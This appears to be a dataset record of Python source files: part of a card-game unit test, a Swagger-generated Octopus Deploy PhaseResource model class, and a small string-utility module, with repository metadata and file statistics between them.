anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False),
Card(number=2, color="red", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card, opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# Zero idx 2
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# with opened_deck
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False)
])
opened_deck = deque([Card(number=3, color="blue", isOpen=False)])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
@get_method_name_decorator
def test_made_quattro_card_change(self):
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="blue", isOpen=False),
Card(number=1, color="yellow", isOpen=False),
Card(number=1, color="red", isOpen=False)
])
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 1)
self.assertEqual(return_card.color, 'yellow')
self.assertTrue(anonymous.player2_changed)
@get_method_name_decorator
def test_top_card_change(self):
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="blue", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=1, color="red", isOpen=False)
])
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 2)
self.assertEqual(return_card.color, 'red')
self.assertTrue(anonymous.player2_changed)
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous.user_deck = [
Card(number=2, color="blue", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=1, color="red", isOpen=False)
]
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 2)
self.assertEqual(return_card.color, 'red')
self.assertTrue(anonymous.player2_changed)
| 43.880597
| 126
| 0.633844
| 5,538
| 0.941837
| 0
| 0
| 5,358
| 0.911224
| 0
| 0
| 431
| 0.073299
|
65d0a80d19258c77b9d91fc06cfaa6455396ecc8
| 10,012
|
py
|
Python
|
octopus_deploy_swagger_client/models/phase_resource.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/models/phase_resource.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/models/phase_resource.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from octopus_deploy_swagger_client.models.retention_period import RetentionPeriod # noqa: F401,E501
class PhaseResource(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'automatic_deployment_targets': 'list[str]',
'optional_deployment_targets': 'list[str]',
'minimum_environments_before_promotion': 'int',
'is_optional_phase': 'bool',
'release_retention_policy': 'RetentionPeriod',
'tentacle_retention_policy': 'RetentionPeriod'
}
attribute_map = {
'id': 'Id',
'name': 'Name',
'automatic_deployment_targets': 'AutomaticDeploymentTargets',
'optional_deployment_targets': 'OptionalDeploymentTargets',
'minimum_environments_before_promotion': 'MinimumEnvironmentsBeforePromotion',
'is_optional_phase': 'IsOptionalPhase',
'release_retention_policy': 'ReleaseRetentionPolicy',
'tentacle_retention_policy': 'TentacleRetentionPolicy'
}
def __init__(self, id=None, name=None, automatic_deployment_targets=None, optional_deployment_targets=None, minimum_environments_before_promotion=None, is_optional_phase=None, release_retention_policy=None, tentacle_retention_policy=None): # noqa: E501
"""PhaseResource - a model defined in Swagger""" # noqa: E501
self._id = None
self._name = None
self._automatic_deployment_targets = None
self._optional_deployment_targets = None
self._minimum_environments_before_promotion = None
self._is_optional_phase = None
self._release_retention_policy = None
self._tentacle_retention_policy = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
if automatic_deployment_targets is not None:
self.automatic_deployment_targets = automatic_deployment_targets
if optional_deployment_targets is not None:
self.optional_deployment_targets = optional_deployment_targets
if minimum_environments_before_promotion is not None:
self.minimum_environments_before_promotion = minimum_environments_before_promotion
if is_optional_phase is not None:
self.is_optional_phase = is_optional_phase
if release_retention_policy is not None:
self.release_retention_policy = release_retention_policy
if tentacle_retention_policy is not None:
self.tentacle_retention_policy = tentacle_retention_policy
@property
def id(self):
"""Gets the id of this PhaseResource. # noqa: E501
:return: The id of this PhaseResource. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this PhaseResource.
:param id: The id of this PhaseResource. # noqa: E501
:type: str
"""
self._id = id
@property
def name(self):
"""Gets the name of this PhaseResource. # noqa: E501
:return: The name of this PhaseResource. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this PhaseResource.
:param name: The name of this PhaseResource. # noqa: E501
:type: str
"""
self._name = name
@property
def automatic_deployment_targets(self):
"""Gets the automatic_deployment_targets of this PhaseResource. # noqa: E501
:return: The automatic_deployment_targets of this PhaseResource. # noqa: E501
:rtype: list[str]
"""
return self._automatic_deployment_targets
@automatic_deployment_targets.setter
def automatic_deployment_targets(self, automatic_deployment_targets):
"""Sets the automatic_deployment_targets of this PhaseResource.
:param automatic_deployment_targets: The automatic_deployment_targets of this PhaseResource. # noqa: E501
:type: list[str]
"""
self._automatic_deployment_targets = automatic_deployment_targets
@property
def optional_deployment_targets(self):
"""Gets the optional_deployment_targets of this PhaseResource. # noqa: E501
:return: The optional_deployment_targets of this PhaseResource. # noqa: E501
:rtype: list[str]
"""
return self._optional_deployment_targets
@optional_deployment_targets.setter
def optional_deployment_targets(self, optional_deployment_targets):
"""Sets the optional_deployment_targets of this PhaseResource.
:param optional_deployment_targets: The optional_deployment_targets of this PhaseResource. # noqa: E501
:type: list[str]
"""
self._optional_deployment_targets = optional_deployment_targets
@property
def minimum_environments_before_promotion(self):
"""Gets the minimum_environments_before_promotion of this PhaseResource. # noqa: E501
:return: The minimum_environments_before_promotion of this PhaseResource. # noqa: E501
:rtype: int
"""
return self._minimum_environments_before_promotion
@minimum_environments_before_promotion.setter
def minimum_environments_before_promotion(self, minimum_environments_before_promotion):
"""Sets the minimum_environments_before_promotion of this PhaseResource.
:param minimum_environments_before_promotion: The minimum_environments_before_promotion of this PhaseResource. # noqa: E501
:type: int
"""
self._minimum_environments_before_promotion = minimum_environments_before_promotion
@property
def is_optional_phase(self):
"""Gets the is_optional_phase of this PhaseResource. # noqa: E501
:return: The is_optional_phase of this PhaseResource. # noqa: E501
:rtype: bool
"""
return self._is_optional_phase
@is_optional_phase.setter
def is_optional_phase(self, is_optional_phase):
"""Sets the is_optional_phase of this PhaseResource.
:param is_optional_phase: The is_optional_phase of this PhaseResource. # noqa: E501
:type: bool
"""
self._is_optional_phase = is_optional_phase
@property
def release_retention_policy(self):
"""Gets the release_retention_policy of this PhaseResource. # noqa: E501
:return: The release_retention_policy of this PhaseResource. # noqa: E501
:rtype: RetentionPeriod
"""
return self._release_retention_policy
@release_retention_policy.setter
def release_retention_policy(self, release_retention_policy):
"""Sets the release_retention_policy of this PhaseResource.
:param release_retention_policy: The release_retention_policy of this PhaseResource. # noqa: E501
:type: RetentionPeriod
"""
self._release_retention_policy = release_retention_policy
@property
def tentacle_retention_policy(self):
"""Gets the tentacle_retention_policy of this PhaseResource. # noqa: E501
:return: The tentacle_retention_policy of this PhaseResource. # noqa: E501
:rtype: RetentionPeriod
"""
return self._tentacle_retention_policy
@tentacle_retention_policy.setter
def tentacle_retention_policy(self, tentacle_retention_policy):
"""Sets the tentacle_retention_policy of this PhaseResource.
:param tentacle_retention_policy: The tentacle_retention_policy of this PhaseResource. # noqa: E501
:type: RetentionPeriod
"""
self._tentacle_retention_policy = tentacle_retention_policy
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(PhaseResource, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PhaseResource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 33.373333
| 257
| 0.663504
| 9,510
| 0.94986
| 0
| 0
| 5,074
| 0.506792
| 0
| 0
| 4,724
| 0.471834
|
65d15f45a4747bc3b8090b4f6795c908d2c9cd6a
| 660
|
py
|
Python
|
src/cryptoadvance/specter/util/common.py
|
jonathancross/specter-desktop
|
0178aa3879134415d63d62098b7f4f1b17db1d13
|
[
"MIT"
] | null | null | null |
src/cryptoadvance/specter/util/common.py
|
jonathancross/specter-desktop
|
0178aa3879134415d63d62098b7f4f1b17db1d13
|
[
"MIT"
] | null | null | null |
src/cryptoadvance/specter/util/common.py
|
jonathancross/specter-desktop
|
0178aa3879134415d63d62098b7f4f1b17db1d13
|
[
"MIT"
] | null | null | null |
import re
def str2bool(my_str):
"""returns a reasonable boolean from a string so that "False" will result in False"""
if my_str is None:
return False
elif isinstance(my_str, str) and my_str.lower() == "false":
return False
elif isinstance(my_str, str) and my_str.lower() == "off":
return False
return bool(my_str)
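# e.g. str2bool("False") -> False, str2bool("off") -> False, str2bool("yes") -> True, str2bool(None) -> False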
def camelcase2snake_case(name):
"""If you pass DeviceManager it returns device_manager"""
pattern = re.compile(r"(?<!^)(?=[A-Z])")
name = pattern.sub("_", name).lower()
return name
def snake_case2camelcase(word):
return "".join(x.capitalize() or "_" for x in word.split("_"))
| 27.5
| 89
| 0.645455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 183
| 0.277273
|